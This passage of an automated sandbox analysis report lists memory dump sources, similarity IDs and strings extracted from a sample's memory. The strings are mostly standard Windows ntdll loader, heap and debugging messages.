                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              • *** enter .exr %p for the exception record, xrefs: 01628FA1
                                                                                                                                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01628FEF
                                                                                                                                                              • The critical section is owned by thread %p., xrefs: 01628E69
                                                                                                                                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01628DC4
                                                                                                                                                              • <unknown>, xrefs: 01628D2E, 01628D81, 01628E00, 01628E49, 01628EC7, 01628F3E
                                                                                                                                                              • write to, xrefs: 01628F56
                                                                                                                                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01628DA3
                                                                                                                                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01628DB5
                                                                                                                                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 01628E02
                                                                                                                                                              • *** Inpage error in %ws:%s, xrefs: 01628EC8
                                                                                                                                                              • *** An Access Violation occurred in %ws:%s, xrefs: 01628F3F
                                                                                                                                                              • The instruction at %p referenced memory at %p., xrefs: 01628EE2
                                                                                                                                                              • a NULL pointer, xrefs: 01628F90
                                                                                                                                                              • *** enter .cxr %p for the context, xrefs: 01628FBD
                                                                                                                                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01628E3F
                                                                                                                                                              • *** then kb to get the faulting stack, xrefs: 01628FCC
                                                                                                                                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01628F26
                                                                                                                                                              • The resource is owned exclusively by thread %p, xrefs: 01628E24
                                                                                                                                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01628E86
                                                                                                                                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01628F2D
                                                                                                                                                              • The instruction at %p tried to %s , xrefs: 01628F66
                                                                                                                                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01628DD3
                                                                                                                                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01628F34
                                                                                                                                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01628E4B
                                                                                                                                                              • read from, xrefs: 01628F5D, 01628F62
                                                                                                                                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01628D8C
                                                                                                                                                              • The resource is owned shared by %d threads, xrefs: 01628E2E
                                                                                                                                                              • an invalid address, %p, xrefs: 01628F7F
                                                                                                                                                              • Go determine why that thread has not released the critical section., xrefs: 01628E75
                                                                                                                                                              • This failed because of error %Ix., xrefs: 01628EF6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • API String ID: 0-108210295
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-2160512332
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              • Critical section address, xrefs: 015E5425, 015E54BC, 015E5534
                                                                                                                                                              • 8, xrefs: 015E52E3
                                                                                                                                                              • undeleted critical section in freed memory, xrefs: 015E542B
                                                                                                                                                              • Critical section debug info address, xrefs: 015E541F, 015E552E
                                                                                                                                                              • Address of the debug info found in the active list., xrefs: 015E54AE, 015E54FA
                                                                                                                                                              • corrupted critical section, xrefs: 015E54C2
                                                                                                                                                              • Invalid debug info address of this critical section, xrefs: 015E54B6
                                                                                                                                                              • double initialized or corrupted critical section, xrefs: 015E5508
                                                                                                                                                              • Thread identifier, xrefs: 015E553A
                                                                                                                                                              • Critical section address., xrefs: 015E5502
                                                                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 015E5543
                                                                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015E54CE
                                                                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015E54E2
                                                                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015E540A, 015E5496, 015E5519
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • API String ID: 0-2368682639
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 015E261F
                                                                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015E22E4
                                                                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015E24C0
                                                                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 015E2409
                                                                                                                                                              • @, xrefs: 015E259B
                                                                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 015E2498
                                                                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 015E2506
                                                                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 015E2412
                                                                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015E25EB
                                                                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 015E2602
                                                                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 015E2624
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • API String ID: 0-4009184096
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                              Strings
                                                                                                                                                              • VerifierDlls, xrefs: 015F8CBD
                                                                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 015F8B8F
                                                                                                                                                              • VerifierFlags, xrefs: 015F8C50
                                                                                                                                                              • VerifierDebug, xrefs: 015F8CA5
                                                                                                                                                              • HandleTraces, xrefs: 015F8C8F
                                                                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 015F8A67
                                                                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 015F8A3D
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                              Strings
                                                                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 015C9A01
                                                                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 015C9A2A
                                                                                                                                                              • LdrpInitShimEngine, xrefs: 015C99F4, 015C9A07, 015C9A30
                                                                                                                                                              • apphelp.dll, xrefs: 01566496
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015C9A11, 015C9A3A
                                                                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015C99ED
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                              Strings
                                                                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 015E2160, 015E219A, 015E21BA
                                                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 015E2165
                                                                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 015E219F
                                                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 015E2180
                                                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 015E2178
                                                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015E21BF
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                              Strings
                                                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 015E8181, 015E81F5
                                                                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 015E8170
                                                                                                                                                              • LdrpInitializeProcess, xrefs: 015AC6C4
                                                                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 015E81E5
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015AC6C3
                                                                                                                                                              • LdrpInitializeImportRedirection, xrefs: 015E8177, 015E81EB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                              • API String ID: 0-475462383
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 015B2DF0: LdrInitializeThunk.NTDLL ref: 015B2DFA
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015B0BA3
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015B0BB6
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015B0D60
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015B0D74
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1404860816-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                              • API String ID: 0-379654539
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              • @, xrefs: 015A8591
                                                                                                                                                              • LdrpInitializeProcess, xrefs: 015A8422
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015A8421
                                                                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 015A855E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-1918872054
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              • .Local, xrefs: 015A28D8
                                                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 015E21DE
                                                                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015E21D9, 015E22B1
                                                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015E22B6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                              • API String ID: 0-1239276146
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 015E342A
                                                                                                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 015E3456
                                                                                                                                                              • RtlDeactivateActivationContext, xrefs: 015E3425, 015E3432, 015E3451
                                                                                                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 015E3437
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                              • API String ID: 0-1245972979
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 015D106B
                                                                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 015D0FE5
                                                                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 015D1028
                                                                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015D10AE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                              • API String ID: 0-1468400865
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 015E362F
                                                                                                                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 015E365C
                                                                                                                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 015E3640, 015E366C
                                                                                                                                                              • LdrpFindDllActivationContext, xrefs: 015E3636, 015E3662
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                              • API String ID: 0-3779518884
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              • LdrpDynamicShimModule, xrefs: 015DA998
                                                                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 015DA992
                                                                                                                                                              • apphelp.dll, xrefs: 01592462
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015DA9A2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-176724104
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0158327D
                                                                                                                                                              • HEAP[%wZ]: , xrefs: 01583255
                                                                                                                                                              • HEAP: , xrefs: 01583264
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                              • API String ID: 0-617086771
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-4253913091
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $@
                                                                                                                                                              • API String ID: 0-1077428164
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                              • API String ID: 0-2779062949
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 015DA10F
                                                                                                                                                              • LdrpCheckModule, xrefs: 015DA117
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015DA121
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-161242083
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                              • API String ID: 0-1334570610
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 015E82D7
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015E82E8
                                                                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 015E82DE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-1783798831
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              • PreferredUILanguages, xrefs: 0162C212
                                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0162C1C5
                                                                                                                                                              • @, xrefs: 0162C1F1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                              • API String ID: 0-2968386058
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
